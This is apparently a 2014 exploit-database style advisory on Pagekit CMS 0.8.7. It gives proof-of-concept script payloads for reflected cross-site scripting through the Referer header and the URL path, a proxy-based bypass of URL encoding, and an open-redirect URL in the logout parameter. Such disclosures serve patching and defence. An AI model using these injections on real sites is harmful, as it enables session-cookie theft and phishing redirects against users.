# Exploit Title: Pagekit 0.8.7 Multiple Vulnerabilities # Date: 13-10-2014 # Remote: Yes # Exploit Author: Mahendra # Vendor Homepage: http://www.pagekit.com/ # Version: 0.8.7 # Tested on: Windows XP SP 3 with WAMP Server 2.4 The latest Pagekit (0.8.7) CMS was found to be vulnerable with multiple reflected cross-site scripting because the application did not properly validate user input. Pagekit is a modular and lightweight CMS built from the ground up with modern technologies like Symfony components and Doctrine. It will have a build-in marketplace to provide an awesome platform for theme and extension developers. Pagekit will be MIT licensed and hosted on GitHub. ------------------------------------------------------------------- Reflected cross-site scripting (CVE-2014-8069) ------------------------------------------------------------------- Referer HTTP Header -------------------- GET /pagekit-0.8.7/index.php/user HTTP/1.1 Host: localhost Referer: <ScRiPt>alert(document.cookie)</ScRiPt> User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: pagekit_session=unl3outg9eufv7fs7juq1ui1m6 Connection: keep-alive Cache-Control: max-age=0 Arbitrary URL -------------------- The application will encode the URL entered by the user below. However, this can be easily bypassed with proxy and modify the URL back to original state. http://localhost/pagekit-0.8.7/index.php/1<ScRiPt>alert(document.cookie)</ScRiPt> ------------------------------------------------------------------- Open redirection (CVE-2014-8070) ------------------------------------------------------------------- http://localhost/pagekit-0.8.7/index.php/user/logout?redirect=http://www.google.com